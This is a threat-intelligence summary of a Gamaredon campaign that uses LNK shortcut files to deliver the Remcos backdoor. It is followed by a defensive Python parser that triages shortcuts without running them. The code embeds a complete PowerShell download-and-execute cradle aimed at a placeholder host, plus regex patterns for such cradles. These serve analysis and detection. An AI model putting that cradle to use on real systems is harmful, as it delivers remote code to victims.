Gamaredon campaign abuses LNK files to distribute Remcos backdoor

Intel Name: Gamaredon campaign abuses LNK files to distribute Remcos backdoor

Date of Scan: March 31, 2025

Impact: Medium

Summary:
A campaign targeting users in Ukraine is using malicious LNK (Windows shortcut) files that launch a PowerShell downloader. The files are named with Russian words relating to troop movements in Ukraine to lure victims into opening them. The downloader connects to geo-fenced servers in Russia and Germany to retrieve a second-stage ZIP archive containing the Remcos backdoor, which is then executed via DLL side-loading. Because the servers are geo-fenced, the second stage may not be retrievable from analysis systems outside the targeted regions. The activity is believed to be associated with the Gamaredon threat actor group.
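The first stage of this campaign lives entirely in the shortcut's own metadata: the LNK's relative path points at powershell.exe and its command-line arguments carry the download cradle. Those fields can be pulled straight out of the Shell Link binary format (MS-SHLLINK) without executing anything, which is how an analyst triages a suspicious shortcut. The following is an added example, not code from the report or from the Gamaredon toolset: a minimal LNK parser that reads the header, skips the ID list and LinkInfo blocks, decodes the StringData fields, and scores them with a small set of PowerShell-cradle heuristics. The sample shortcut it builds is constructed here for illustration (the path, arguments and `example.invalid` host are placeholders, not indicators from the campaign); the heuristic labels and the `build_lnk` helper are likewise this example's own.

```python
import re
import struct
from dataclasses import dataclass

# ShellLinkHeader constants from MS-SHLLINK.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7  # 7 starts the target minimised, hiding the console window

# Heuristic patterns for PowerShell download cradles. These are this example's own labels, not report IOCs.
SUSPICIOUS_PATTERNS = {
    "powershell": r"\bpowershell(\.exe)?\b|\bpwsh\b",
    "hidden-window": r"-w(indowstyle)?\s+hidden\b",
    "no-profile": r"-nop(rofile)?\b",
    "policy-bypass": r"-(ep|executionpolicy)\s+bypass\b",
    "encoded-command": r"-e(nc|ncodedcommand)?\b",
    "download-cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
    "in-memory-exec": r"\biex\b|invoke-expression",
    "url": r"https?://",
}


@dataclass
class LnkInfo:
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def _read_string(buf: bytes, off: int, unicode: bool) -> tuple[str, int]:
    """Read one StringData entry: a 2-byte character count followed by the (unterminated) string."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    nbytes = count * 2 if unicode else count
    if off + nbytes > len(buf):
        raise ValueError("StringData runs past end of file")
    raw = buf[off:off + nbytes]
    text = raw.decode("utf-16-le", errors="replace") if unicode else raw.decode("cp1252", errors="replace")
    return text, off + nbytes


def parse_lnk(buf: bytes) -> LnkInfo:
    """Parse the header and StringData of a .lnk file without resolving or executing the target."""
    if len(buf) < LNK_HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", buf, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    (show_command,) = struct.unpack_from("<I", buf, 60)  # ShowCommand field offset within the header
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        (idlist_size,) = struct.unpack_from("<H", buf, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:  # LinkInfoSize is the first DWORD of the LinkInfo structure
        (linkinfo_size,) = struct.unpack_from("<I", buf, off)
        off += linkinfo_size
    info = LnkInfo(show_command=show_command)
    unicode = bool(flags & IS_UNICODE)
    for flag, attr in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                       (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            value, off = _read_string(buf, off, unicode)
            setattr(info, attr, value)
    return info


def triage(info: LnkInfo) -> list[str]:
    """Return the heuristic labels that fire on the attacker-controlled target and argument fields."""
    haystack = " ".join((info.relative_path, info.working_dir, info.arguments)).lower()
    hits = [label for label, pattern in SUSPICIOUS_PATTERNS.items() if re.search(pattern, haystack)]
    if info.show_command == SW_SHOWMINNOACTIVE:
        hits.append("minimised-window")
    return hits


def build_lnk(relative_path: str, arguments: str = "", working_dir: str = "", show_command: int = SW_SHOWNORMAL) -> bytes:
    """Build a minimal Unicode .lnk (header + StringData only) for testing the parser. Constructed, not a real sample."""
    flags, body = IS_UNICODE, b""
    for flag, value in ((HAS_RELATIVE_PATH, relative_path), (HAS_WORKING_DIR, working_dir), (HAS_ARGUMENTS, arguments)):
        if value:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0,
                         show_command, 0, 0, 0, 0)
    return header + body


# Constructed sample mirroring the shape described above: shortcut to powershell.exe with a download cradle.
SAMPLE_PATH = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGS = "-w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\""

if __name__ == "__main__":
    import sys
    blobs = [open(p, "rb").read() for p in sys.argv[1:]] or [build_lnk(SAMPLE_PATH, SAMPLE_ARGS, show_command=SW_SHOWMINNOACTIVE)]
    for blob in blobs:
        info = parse_lnk(blob)
        print(f"target={info.relative_path!r} args={info.arguments!r} hits={triage(info)}")
```

Run it with one or more `.lnk` paths to print the target, arguments and heuristic hits for each; with no arguments it triages the constructed sample. The parser deliberately stops at StringData and never resolves the shortcut, so it is safe to run over quarantined files.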
